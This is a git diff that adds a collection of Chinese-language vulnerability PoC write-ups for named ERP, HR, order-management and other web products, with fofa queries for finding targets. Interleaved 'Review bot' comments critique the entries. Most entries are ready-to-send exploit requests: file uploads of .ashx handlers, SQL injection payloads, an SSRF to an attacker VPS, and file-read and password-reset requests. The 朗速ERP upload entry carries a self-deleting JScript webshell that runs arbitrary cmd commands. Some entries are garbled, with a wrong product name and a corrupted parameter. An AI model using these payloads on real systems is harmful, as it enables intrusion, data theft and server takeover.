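Review bot: the poc in 月子会所ERP管理云平台GetData.ashx存在SQL注入.md is not a raw HTTP request: the `Phone=` value contains `{{urlescape(' AND 4798 IN (SELECT (CHAR(113)+...))-- uTFu)}}`, a template function that only a scanner such as nuclei expands. Either give the already URL-encoded form or say which tool the request is written for. The CHAR() chain evaluates to `qvqzq` + `1` (the `CASE WHEN (4798=4798)` branch) + `qkxbq`, so the expected substring in the response is `qvqzq1qkxbq`; state it. The summary runs two clauses together (`...存在SQL注入漏洞未经身份验证的恶意攻击者利用...`); add the missing punctuation.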
@@ -0,0 +1,62 @@ +# 月子会所ERP管理云平台ICManager任意文件上传漏洞 + +# 一、漏洞简介 +月子会ERP管理云平台是由武汉金同方科技有限公司研发团队结合行业月子中心相关企业需求开发的一套综合性管理软件,管控月子中心经营过程中各个环节。由于未对上传文件进行任何过滤,可上传任意文件,攻击者可利用该漏洞获取服务器控制权。 + +# 二、影响版本 ++ 月子会所ERP管理云平台 + +# 三、资产测绘 ++ fofa`product="妈妈宝盒-ERP"` ++ 登录页面 + +![1693185375907-6915a126-7596-4142-b75c-f6a9c41760ab.png](./img/E9mmf8vZc6XPsq9a/1693185375907-6915a126-7596-4142-b75c-f6a9c41760ab-894601.png) + +# 四、漏洞复现 +```plain +POST /Page/ICManager/ashx/Handler.ashx HTTP/1.1 +Content-Type: multipart/form-data; boundary=00content0boundary00 +User-Agent: Java/1.8.0_301 +Host: xx.xx.xx.xx +Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 +Content-Length: 497 +Connection: close + +--00content0boundary00 +Content-Disposition: form-data; name="file"; filename="1.ashx" + +<% @ webhandler language="C#" class="AverageHandler" %> +using System; +using System.Web; + +public class AverageHandler : IHttpHandler +{ + public bool IsReusable + { + get { + return true; + } + } + public void ProcessRequest(HttpContext ctx) + { + ctx.Response.Write("hello"); + } + } +--00content0boundary00-- + +``` + +![1695622920151-0f825dda-fba9-4034-a568-f6cea0263720.png](./img/E9mmf8vZc6XPsq9a/1695622920151-0f825dda-fba9-4034-a568-f6cea0263720-007458.png) + +根据回显拼接上传文件位置 + +```plain +/UploadBaseFolder/Contact/230925754082.ashx +``` + +![1695622959930-af81fc07-8b36-4612-810d-3acdb51c7a25.png](./img/E9mmf8vZc6XPsq9a/1695622959930-af81fc07-8b36-4612-810d-3acdb51c7a25-056786.png) + + + +> 更新: 2024-02-29 23:55:51 +> 原文: \ No newline at end of file diff --git a/月子会所ERP管理云平台MicroMall任意文件上传漏洞.md b/月子会所ERP管理云平台MicroMall任意文件上传漏洞.md new file mode 100644 index 0000000..4a37639 Binary files /dev/null and b/月子会所ERP管理云平台MicroMall任意文件上传漏洞.md differ diff --git a/月子会所ERP管理云平台ModuleUpHandler任意文件上传漏洞.md b/月子会所ERP管理云平台ModuleUpHandler任意文件上传漏洞.md new file mode 100644 index 0000000..163d59d Binary files /dev/null and b/月子会所ERP管理云平台ModuleUpHandler任意文件上传漏洞.md differ 
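Review bot: 月子会所ERP管理云平台ICManager任意文件上传漏洞.md declares `Content-Length: 497` for a multipart body that is byte-for-byte the one in the BasicInfo and UploadComponent entries, where it is declared as 481; both cannot be right, and a wrong length makes the server either wait for more data or cut the body short. Recompute it, or drop the header and let the replay tool set it. The stored path `/UploadBaseFolder/Contact/230925754082.ashx` is the same `Contact` folder the BasicInfo handler writes to; a sentence saying so would tell responders that one cleanup location covers both. The MicroMall and ModuleUpHandler entries that follow are committed as binaries and cannot be reviewed.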
diff --git a/月子会所ERP管理云平台SelectUserMangerPrint存在SQL注入漏洞.md b/月子会所ERP管理云平台SelectUserMangerPrint存在SQL注入漏洞.md new file mode 100644 index 0000000..646b5a7 --- /dev/null +++ b/月子会所ERP管理云平台SelectUserMangerPrint存在SQL注入漏洞.md 
@@ -0,0 +1,45 @@ +# 月子会所ERP管理云平台SelectUserMangerPrint存在SQL注入漏洞 + +# 一、漏洞简介 +月子会ERP管理云平台是由武汉金同方科技有限公司研发团队结合行业月子中心相关企业需求开发的一套综合性管理软件,管控月子中心经营过程中各个环节。月子会所ERP管理云平台SelectUserMangerPrint存在SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感数据。 + +# 二、影响版本 ++ 月子会所ERP管理云平台 + +# 三、资产测绘 ++ fofa`product="妈妈宝盒-ERP"` ++ 登录页面 + +![1693185375907-6915a126-7596-4142-b75c-f6a9c41760ab.png](./img/PbyyHJcsNm9df-Mp/1693185375907-6915a126-7596-4142-b75c-f6a9c41760ab-570049.png) + +# 四、漏洞复现 +```java +GET /Page/SalerManager/SelectUserMangerPrint.aspx?id=1%29+UNION+ALL+SELECT+NULL%2CNULL%2CCHAR%28113%29%2BCHAR%28113%29%2BCHAR%28120%29%2BCHAR%2898%29%2BCHAR%28113%29%2BCHAR%2882%29%2BCHAR%28113%29%2BCHAR%2870%29%2BCHAR%28108%29%2BCHAR%2883%29%2BCHAR%28111%29%2BCHAR%28106%29%2BCHAR%2888%29%2BCHAR%2878%29%2BCHAR%2884%29%2BCHAR%28112%29%2BCHAR%28122%29%2BCHAR%28103%29%2BCHAR%28110%29%2BCHAR%28109%29%2BCHAR%2897%29%2BCHAR%28113%29%2BCHAR%28107%29%2BCHAR%28116%29%2BCHAR%2872%29%2BCHAR%2876%29%2BCHAR%2878%29%2BCHAR%2880%29%2BCHAR%28113%29%2BCHAR%2868%29%2BCHAR%28118%29%2BCHAR%28112%29%2BCHAR%2878%29%2BCHAR%2898%29%2BCHAR%2890%29%2BCHAR%28108%29%2BCHAR%28113%29%2BCHAR%2874%29%2BCHAR%2883%29%2BCHAR%2868%29%2BCHAR%2882%29%2BCHAR%28117%29%2BCHAR%2873%29%2BCHAR%2877%29%2BCHAR%2874%29%2BCHAR%28113%29%2BCHAR%28122%29%2BCHAR%28118%29%2BCHAR%28120%29%2BCHAR%28113%29%2CNULL--+EfIE HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Cookie: ASP.NET_SessionId=mf1ihdp1nrlqfspeocl1np1d +Upgrade-Insecure-Requests: 1 +``` + +![1710301276767-6643edd8-3299-4694-90cd-424500930546.png](./img/PbyyHJcsNm9df-Mp/1710301276767-6643edd8-3299-4694-90cd-424500930546-346858.png) + +```java +qqxbqRqFlSojXNTpzgnmaqktHLNPqDvpNbZlqJSDRuIMJqzvxq +``` + +sqlmap + +```java 
+/Page/SalerManager/SelectUserMangerPrint.aspx?id=1 +``` + +![1710301303427-1c124b60-b297-4df6-9ce0-f9df37306055.png](./img/PbyyHJcsNm9df-Mp/1710301303427-1c124b60-b297-4df6-9ce0-f9df37306055-662745.png) + + + +> 更新: 2024-04-17 17:13:53 +> 原文: \ No newline at end of file diff --git a/月子会所ERP管理云平台UploadComponent任意文件上传漏洞.md b/月子会所ERP管理云平台UploadComponent任意文件上传漏洞.md new file mode 100644 index 0000000..aef782e --- /dev/null +++ b/月子会所ERP管理云平台UploadComponent任意文件上传漏洞.md 
@@ -0,0 +1,61 @@ +# 月子会所ERP管理云平台UploadComponent任意文件上传漏洞 + +# 一、漏洞简介 +月子会ERP管理云平台是由武汉金同方科技有限公司研发团队结合行业月子中心相关企业需求开发的一套综合性管理软件,管控月子中心经营过程中各个环节。由于未对上传文件进行任何过滤,可上传任意文件,攻击者可利用该漏洞获取服务器控制权。 + +# 二、影响版本 ++ 月子会所ERP管理云平台 + +# 三、资产测绘 ++ fofa`product="妈妈宝盒-ERP"` ++ 登录页面 + +![1693185375907-6915a126-7596-4142-b75c-f6a9c41760ab.png](./img/gY9C_r2Y0iYGY2BO/1693185375907-6915a126-7596-4142-b75c-f6a9c41760ab-072945.png) + +# 四、漏洞复现 +```plain +POST /Page/UploadComponent/UploadComponentHandler.ashx HTTP/1.1 +Content-Type: multipart/form-data; boundary=00content0boundary00 +User-Agent: Java/1.8.0_381 +Host: xx.xx.xx.xx +Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 +Content-Length: 481 +Connection: close + +--00content0boundary00 +Content-Disposition: form-data; name="file"; filename="1.ashx" + +<% @ webhandler language="C#" class="AverageHandler" %> +using System; +using System.Web; + +public class AverageHandler : IHttpHandler +{ + public bool IsReusable + { + get { + return true; + } + } + public void ProcessRequest(HttpContext ctx) + { + ctx.Response.Write("hello"); + } + } +--00content0boundary00-- +``` + +![1693185672475-3ec6cca2-4d1a-4ca1-bb1a-511929b82e4a.png](./img/gY9C_r2Y0iYGY2BO/1693185672475-3ec6cca2-4d1a-4ca1-bb1a-511929b82e4a-206384.png) + +上传文件位置 + +```plain +http://xx.xx.xx.xx/UploadBaseFolder/ERP/202308/1_230828092026228129.ashx +``` + +![1693185711006-d52a0121-dbfa-4151-91a9-8a68a5ca3edb.png](./img/gY9C_r2Y0iYGY2BO/1693185711006-d52a0121-dbfa-4151-91a9-8a68a5ca3edb-460244.png) + + + +> 更新: 2024-02-29 23:55:51 +> 原文: \ No newline at end of file diff --git a/月子会所ERP管理云平台upload任意文件上传漏洞.md b/月子会所ERP管理云平台upload任意文件上传漏洞.md new file mode 100644 index 0000000..de90a92 --- /dev/null +++ b/月子会所ERP管理云平台upload任意文件上传漏洞.md 
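Review bot: this file and 月子会所ERP管理云平台upload任意文件上传漏洞.md are the same request apart from the handler path (`/Page/UploadComponent/UploadComponentHandler.ashx` here, `/Page/upload/UploadComponentHandler.ashx` there) and the returned storage location; either merge them into one entry listing both routes or say in 漏洞简介 that the same handler is exposed twice. The 上传文件位置 line `/UploadBaseFolder/ERP/202308/1_230828092026228129.ashx` shows the server keeps the client-supplied `.ashx` extension and stores the file inside the served tree; that is the defect to name, and the fix is an extension allowlist plus storage outside the web root, not just "filtering" as 漏洞简介 puts it.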
@@ -0,0 +1,62 @@ +# 月子会所ERP管理云平台upload任意文件上传漏洞 + +# 一、漏洞简介 +月子会ERP管理云平台是由武汉金同方科技有限公司研发团队结合行业月子中心相关企业需求开发的一套综合性管理软件,管控月子中心经营过程中各个环节。由于未对上传文件进行任何过滤,可上传任意文件,攻击者可利用该漏洞获取服务器控制权。 + +# 二、影响版本 ++ 月子会所ERP管理云平台 + +# 三、资产测绘 ++ fofa`product="妈妈宝盒-ERP"` ++ 登录页面 + +![1693185375907-6915a126-7596-4142-b75c-f6a9c41760ab.png](./img/voyuHtcl_zUwlhHw/1693185375907-6915a126-7596-4142-b75c-f6a9c41760ab-255517.png) + +# 四、漏洞复现 +```plain +POST /Page/upload/UploadComponentHandler.ashx HTTP/1.1 +Content-Type: multipart/form-data; boundary=00content0boundary00 +User-Agent: Java/1.8.0_301 +Host: xx.xx.xx.xx +Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 +Content-Length: 497 +Connection: close + +--00content0boundary00 +Content-Disposition: form-data; name="file"; filename="1.ashx" + +<% @ webhandler language="C#" class="AverageHandler" %> +using System; +using System.Web; + +public class AverageHandler : IHttpHandler +{ + public bool IsReusable + { + get { + return true; + } + } + public void ProcessRequest(HttpContext ctx) + { + ctx.Response.Write("hello"); + } + } +--00content0boundary00-- + +``` + +![1695625519716-92e1ae6f-713d-49e3-bcce-dd74452e8993.png](./img/voyuHtcl_zUwlhHw/1695625519716-92e1ae6f-713d-49e3-bcce-dd74452e8993-231673.png) + +上传文件位置 + +```plain +/UploadBaseFolder/ERP/202309/1_230925150451061741.ashx +``` + +![1695625556076-a2555b8c-41e1-4efb-a711-39f2f3929018.png](./img/voyuHtcl_zUwlhHw/1695625556076-a2555b8c-41e1-4efb-a711-39f2f3929018-397938.png) + + + +> 更新: 2024-02-29 23:55:51 +> 原文: \ No newline at end of file diff --git a/月子会所ERP管理云平台存在目录遍历漏洞.md b/月子会所ERP管理云平台存在目录遍历漏洞.md new file mode 100644 index 0000000..69be164 --- /dev/null +++ b/月子会所ERP管理云平台存在目录遍历漏洞.md 
@@ -0,0 +1,25 @@ +# 月子会所ERP管理云平台存在目录遍历漏洞 + +# 一、漏洞简介 +月子会ERP管理云平台是由武汉金同方科技有限公司研发团队结合行业月子中心相关企业需求开发的一套综合性管理软件,管控月子中心经营过程中各个环节。武汉金同方科技月子会ERP管理云平台存在目录遍历漏洞,攻击者可利用该漏洞获取敏感信息。 + +# 二、影响版本 ++ 月子会所ERP管理云平台 + +# 三、资产测绘 ++ fofa`product="妈妈宝盒-ERP"` ++ 登录页面 + +![1693185375907-6915a126-7596-4142-b75c-f6a9c41760ab.png](./img/26m4xlcMgRMyEUJ7/1693185375907-6915a126-7596-4142-b75c-f6a9c41760ab-437960.png) + +# 四、漏洞复现 +```plain +http://xx.xx.xx.xx/Page/ +``` + +![1693186499483-de262214-f715-46e2-9591-44bfe7eb1c08.png](./img/26m4xlcMgRMyEUJ7/1693186499483-de262214-f715-46e2-9591-44bfe7eb1c08-999200.png) + + + +> 更新: 2024-02-29 23:55:51 +> 原文: \ No newline at end of file diff --git a/朗新天霁智能eHR人力资源管理系统GetE01ByDeptCode存在SQL注入漏洞.md b/朗新天霁智能eHR人力资源管理系统GetE01ByDeptCode存在SQL注入漏洞.md new file mode 100644 index 0000000..1005467 --- /dev/null +++ b/朗新天霁智能eHR人力资源管理系统GetE01ByDeptCode存在SQL注入漏洞.md @@ -0,0 +1,29 @@ +# 朗新天霁智能eHR人力资源管理系统GetE01ByDeptCode存在SQL注入漏洞 + +朗新天霁智能eHR人力资源管理系统GetE01ByDeptCode存在SQL注入漏洞,攻击者可获取数据库敏感数据。 + +## fofa + +```java +body="divRememberPwd" +``` + +## poc + +```java +POST /api/Com/GetE01ByDeptCode HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Content-Type: application/json +Connection: close + +{"deptCode":"1') AND 8104=8104 AND ('UCOF'='UCOF"} +``` + + + +## 漏洞来源 + +- https://mp.weixin.qq.com/s/YukReJJYMHD0tuZyfgcjhg \ No newline at end of file diff --git a/朗速ERP系统FileUploadApi.ashx存在文件上传漏洞.md b/朗速ERP系统FileUploadApi.ashx存在文件上传漏洞.md new file mode 100644 index 0000000..506d24d --- /dev/null +++ b/朗速ERP系统FileUploadApi.ashx存在文件上传漏洞.md 
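Review bot: the 目录遍历 hunk gives only `http://xx.xx.xx.xx/Page/` and leaves the result to the screenshot; add one sentence saying the response is a directory listing of `/Page/` (directory browsing enabled on the web server), since that is what separates this entry from the injection and upload entries for the same product and what the fix, disabling directory browsing, addresses. In the 朗新天霁 GetE01ByDeptCode hunk the body `{"deptCode":"1') AND 8104=8104 AND ('UCOF'='UCOF"}` is only the true branch of a boolean check and no expected response is recorded, so the entry cannot be used to confirm or rule out the issue; also both blocks are fenced as ```java although they hold a fofa query and an HTTP request.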
@@ -0,0 +1,44 @@ +# 朗速ERP系统FileUploadApi.ashx存在文件上传漏洞 + + + +## fofa +```javascript +body="/Resource/Scripts/Yw/Yw_Bootstrap.js" +``` + +## poc +```javascript +POST /Api/FileUploadApi.ashx?method=DoWebUpload HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 +Accept-Encoding: gzip, deflate +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFfJZ4PlAZBixjELj +Accept: */* +Connection: close + +------WebKitFormBoundaryFfJZ4PlAZBixjELj +Content-Disposition: form-data; name="file"; filename="1.aspx" +Content-Type: image/jpeg + +<%@ Page Language="Jscript" validateRequest="false" %> +<% +var c=new System.Diagnostics.ProcessStartInfo("cmd"); +var e=new System.Diagnostics.Process(); +var out:System.IO.StreamReader,EI:System.IO.StreamReader; +c.UseShellExecute=false; +c.RedirectStandardOutput=true; +c.RedirectStandardError=true; +e.StartInfo=c; +c.Arguments="/c " + Request.Item["cmd"]; +e.Start(); +out=e.StandardOutput; +EI=e.StandardError; +e.Close(); +Response.Write(out.ReadToEnd() + EI.ReadToEnd()); +System.IO.File.Delete(Request.PhysicalPath); +Response.End();%> +------WebKitFormBoundaryFfJZ4PlAZBixjELj-- +``` + +![image-20241227222402497](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272224571.png) \ No newline at end of file diff --git a/朗速ERP系统接口UEditorAjaxApi.ashx存在SSRF漏洞.md b/朗速ERP系统接口UEditorAjaxApi.ashx存在SSRF漏洞.md new file mode 100644 index 0000000..bbe811e --- /dev/null +++ b/朗速ERP系统接口UEditorAjaxApi.ashx存在SSRF漏洞.md 
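Review bot: the 朗速ERP FileUploadApi.ashx entry has no description at all (two blank lines between the title and `## fofa`) and no 漏洞来源, unlike its sibling UEditorAjaxApi entry; at minimum say what `method=DoWebUpload` does with the uploaded file and that no extension check is applied. The uploaded body is a full command-execution page (`Request.Item["cmd"]` handed to `cmd /c`, output echoed back, then `System.IO.File.Delete(Request.PhysicalPath)`); a benign marker page such as the `Response.Write("hello")` handler used in the 月子会所 entries proves the missing check equally well, and because this one deletes itself, an incident responder will find no file on disk afterwards and only the web-server log line for `1.aspx`, which is worth stating.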
@@ -0,0 +1,24 @@ +# 朗速ERP系统接口UEditorAjaxApi.ashx存在SSRF漏洞 + +朗速ERP UEditorAjaxApi.ashx 接口存在SSRF漏洞,未经身份验证的远程攻击者可以利用该漏洞在VPS上构造恶意文件,使服务器访问并下载文件到本地,进而控制服务器权限。 + +## fofa +```javascript +body="/Resource/Scripts/Yw/Yw_Bootstrap.js" +``` + +## poc +```javascript +POST /Api/UEditor/UEditorAjaxApi.ashx?method=catchimage HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0 +Accept: */* +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate, br, zstd +Content-Type: application/x-www-form-urlencoded; charset=utf-8 +Connection: keep-alive + +source[]=http://vpsip +``` + +![image-20250103185025413](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202501031850476.png) \ No newline at end of file diff --git a/杜特网上订单管理系统Login.ashx存在SQL注入漏洞.md b/杜特网上订单管理系统Login.ashx存在SQL注入漏洞.md new file mode 100644 index 0000000..b593540 --- /dev/null +++ b/杜特网上订单管理系统Login.ashx存在SQL注入漏洞.md @@ -0,0 +1,24 @@ +# 杜特网上订单管理系统Login.ashx存在SQL注入漏洞 + +杜特网上订单管理系统Login.ashx存在SQL注入漏洞 + +## fofa + +```javascript +app="TUTORSOFT-ERP" +``` + +## poc + +```javascript +POST /ajax/Login.ashx HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Connection: close +Content-Type: application/x-www-form-urlencoded + +LoginCode=1';WAITFOR+DELAY+'0:0:5'--&Password=1&ckRemember=0 +``` + diff --git a/杜特网上订单管理系统getUserImage.ashx存在SQL注入漏洞.md b/杜特网上订单管理系统getUserImage.ashx存在SQL注入漏洞.md new file mode 100644 index 0000000..4eb437b --- /dev/null +++ b/杜特网上订单管理系统getUserImage.ashx存在SQL注入漏洞.md 
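Review bot: in the UEditorAjaxApi.ashx SSRF hunk, `source[]=http://vpsip` is a placeholder that is not marked as one, and the 漏洞简介 claim that the server downloads the file and this leads to "控制服务器权限" is not supported by anything shown; the visible evidence is an outbound fetch of a caller-chosen URL through `method=catchimage`, so describe it as SSRF with the follow-on impact unverified, and record the fix as a host/scheme allowlist on `source[]`. In the 杜特 Login.ashx hunk, `LoginCode=1';WAITFOR+DELAY+'0:0:5'--` is a time-based check that only means something if the response is delayed by roughly five seconds; state that expected delay, and that a single slow response is not conclusive.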
@@ -0,0 +1,22 @@ +# 杜特网上订单管理系统getUserImage.ashx存在SQL注入漏洞 + +杜特网上订单管理系统getUserImage.ashx存在SQL注入漏洞 + +## fofa + +```javascript +app="TUTORSOFT-ERP" +``` + +## poc + +```javascript +GET /ajax/getUserImage.ashx?locadCode=admin%27/**/and(select+1)>0waitfor/**/delay%270:0:5 HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Connection: close +``` + +![image-20241219151440983](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412191514043.png) diff --git a/杭州三一谦成科技车辆监控服务平台接口platformSql存在SQL注入漏洞.md b/杭州三一谦成科技车辆监控服务平台接口platformSql存在SQL注入漏洞.md new file mode 100644 index 0000000..f8b7c22 --- /dev/null +++ b/杭州三一谦成科技车辆监控服务平台接口platformSql存在SQL注入漏洞.md @@ -0,0 +1,20 @@ +# 杭州三一谦成科技车辆监控服务平台接口platformSql存在SQL注入漏洞 + +杭州三一谦成科技车辆监控服务平台接口 /gps-web/platformSql 存在SQL 注入漏洞 + + + +## poc + +```java +POST /gps-web/platformSql HTTP/1.1 +Host: +User-Agent: python-requests/2.28.1 +Accept-Encoding: gzip, deflate +Accept: */* Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 74 + +action=EXEC_SQL¶ms=SELECT schema_name FROM information_schema.schemata +``` + diff --git a/极简云验证系统download存在任意文件读取漏洞.md b/极简云验证系统download存在任意文件读取漏洞.md new file mode 100644 index 0000000..8668d44 --- /dev/null +++ b/极简云验证系统download存在任意文件读取漏洞.md 
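Review bot: the 杭州三一谦成 platformSql hunk has two formatting defects: `Accept: */* Connection: keep-alive` are two headers run onto one line, and in the body `action=EXEC_SQL¶ms=SELECT ...` the sequence `&para` has been rendered as the `¶` entity, so the `&params=` separator is corrupted. Beyond formatting, an endpoint whose `action=EXEC_SQL` runs a raw SQL string from a parameter is direct query execution rather than injection; the entry should say so and whether the endpoint needs authentication, since the fix is removing or authenticating the endpoint, not escaping input. The 杜特 getUserImage hunk would also benefit from noting that `waitfor/**/delay%270:0:5` is a time-based check.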
@@ -0,0 +1,28 @@ +# 极简云验证系统download存在任意文件读取漏洞 + +# 一、漏洞简介 + 极简云验证系统是一种简洁高效的身份验证方案,通过使用云端技术,实现用户身份验证和访问控制。用户只需输入手机号或邮箱等基本信息,系统即可发送验证码,验证过程快速便捷。此系统具有高度可扩展性和安全性,可适用于各种应用场景,如登录、支付等。同时,它还支持多种验证方式,如短信验证码、邮箱验证码等,为用户提供了灵活多样的选择。极简云验证系统download存在任意文件读取漏洞. + +# 二、影响版本 ++ 极简云验证系统 + +# 三、资产测绘 ++ fofa`body="/js/lib/slimscroll.js"` ++ 特征 + +![1716702913106-fec91c96-5f2a-4063-a0e5-b65356000943.png](./img/LoAiN1zPg1DKrr7w/1716702913106-fec91c96-5f2a-4063-a0e5-b65356000943-988402.png) + +# 四、漏洞复现 +```plain +GET /download.php?file=20b6cb088a8d5c444074&filename=config.php HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 +Content-Length: 0 +``` + +![1716702895265-c8e22574-c199-4d32-9242-a80b5e812e26.png](./img/LoAiN1zPg1DKrr7w/1716702895265-c8e22574-c199-4d32-9242-a80b5e812e26-138711.png) + + + +> 更新: 2024-06-01 11:14:22 +> 原文: \ No newline at end of file diff --git a/极简云验证系统存在敏感信息泄露漏洞.md b/极简云验证系统存在敏感信息泄露漏洞.md new file mode 100644 index 0000000..765d9de --- /dev/null +++ b/极简云验证系统存在敏感信息泄露漏洞.md 
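Review bot: the `file=20b6cb088a8d5c444074` value in the download.php request is unexplained; say whether it is a fixed token, a per-install value or an arbitrary string, because that decides whether the entry is arbitrary file read or read with a known token. The `filename=config.php` parameter is evidently what selects the file on disk, so the fix to record is resolving `filename` against a fixed directory or allowlist instead of using it verbatim; the 漏洞简介 currently describes the product's features and gives the defect one sentence.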
@@ -0,0 +1,32 @@ +# 极简云验证系统存在敏感信息泄露漏洞 + +# 一、漏洞简介 + 极简云验证系统是一种简洁高效的身份验证方案,通过使用云端技术,实现用户身份验证和访问控制。用户只需输入手机号或邮箱等基本信息,系统即可发送验证码,验证过程快速便捷。此系统具有高度可扩展性和安全性,可适用于各种应用场景,如登录、支付等。同时,它还支持多种验证方式,如短信验证码、邮箱验证码等,为用户提供了灵活多样的选择。此系统某接口存在信息泄露。 + +# 二、影响版本 ++ 深澜计费管理系统 + +# 三、资产测绘 ++ fofa`body="/js/lib/slimscroll.js"` ++ 特征 + +![1716703161984-d5a483f8-056b-476a-9a36-357d4813a920.png](./img/D238bvh7ZMl7LoVs/1716703161984-d5a483f8-056b-476a-9a36-357d4813a920-296981.png) + +# 四、漏洞复现 +```plain +GET /%E6%95%B0%E6%8D%AE%E5%BA%93.sql HTTP/1.1 +Host: +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 + +``` + +![1716703107785-ee5492bd-bc33-43f1-a1a8-dfbb4f5707fc.png](./img/D238bvh7ZMl7LoVs/1716703107785-ee5492bd-bc33-43f1-a1a8-dfbb4f5707fc-247991.png) + + + +> 更新: 2024-06-01 11:16:33 +> 原文: \ No newline at end of file diff --git a/某U挖矿质押单语言系统imageupload后台任意文件上传漏洞.md b/某U挖矿质押单语言系统imageupload后台任意文件上传漏洞.md new file mode 100644 index 0000000..60cb1bc --- /dev/null +++ b/某U挖矿质押单语言系统imageupload后台任意文件上传漏洞.md 
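Review bot: 二、影响版本 lists `深澜计费管理系统`, which does not match the product in the title and 漏洞简介 (极简云验证系统); this looks copied from another entry and should read 极简云验证系统. The request path `/%E6%95%B0%E6%8D%AE%E5%BA%93.sql` decodes to `/数据库.sql`, i.e. a database dump left in the web root; say that instead of "某接口存在信息泄露", because the remediation (remove the dump and stop serving `.sql` files) is different from an API leak.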
@@ -0,0 +1,38 @@ +# 某U挖矿质押单语言系统imageupload后台任意文件上传漏洞 + +位于 /admin/controller/News.php 控制器的 imageupload 方法存在一个很明显的上传文件操作file(),且无任何限制,导致漏洞产生 + +## fofa + +```java +"/static/index/css/login/framework7.ios.min.css" +``` + +## poc + +```javascript +POST /admin/news/imageupload HTTP/1.1 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate, br, zstd +Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7 +Cache-Control: max-age=0Connection: keep-alive +Content-Length: 197 +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryydBYM59rmMIhj0gw +Cookie: PHPSESSID=jt6bie950imjojfm9aj6hpfl10 +Host: 127.0.0.1:81 +Origin: http://127.0.0.1:81 +Referer: http://127.0.0.1:81/admin/news/imageupload +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: noneUpgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 + +------WebKitFormBoundary03rNBzFMIytvpWhy +Content-Disposition: form-data; name="file"; filename="1.php" +Content-Type: image/jpeg + + +------WebKitFormBoundary03rNBzFMIytvpWhy-- +``` + +![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408281248642.webp) \ No newline at end of file diff --git a/某U挖矿质押单语言系统前台未授权修改管理员密码.md b/某U挖矿质押单语言系统前台未授权修改管理员密码.md new file mode 100644 index 0000000..dce7b43 --- /dev/null +++ b/某U挖矿质押单语言系统前台未授权修改管理员密码.md @@ -0,0 +1,23 @@ +# 某U挖矿质押单语言系统前台未授权修改管理员密码 + +位于 /admin/controller/Login.php 有个很明显操纵SQL的update操作,重置了管理员的密码为123456,且未设置鉴权,非常明显是个后门 + +## fofa + +```java +"/static/index/css/login/framework7.ios.min.css" +``` + +## poc + +``` +/admin/login/setpassword +``` + +![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408281245679.webp) + + + +## 漏洞来源 + +- https://mp.weixin.qq.com/s/EL-1pxjTNUS5fAKVX1zlrQ \ No newline at end of file 
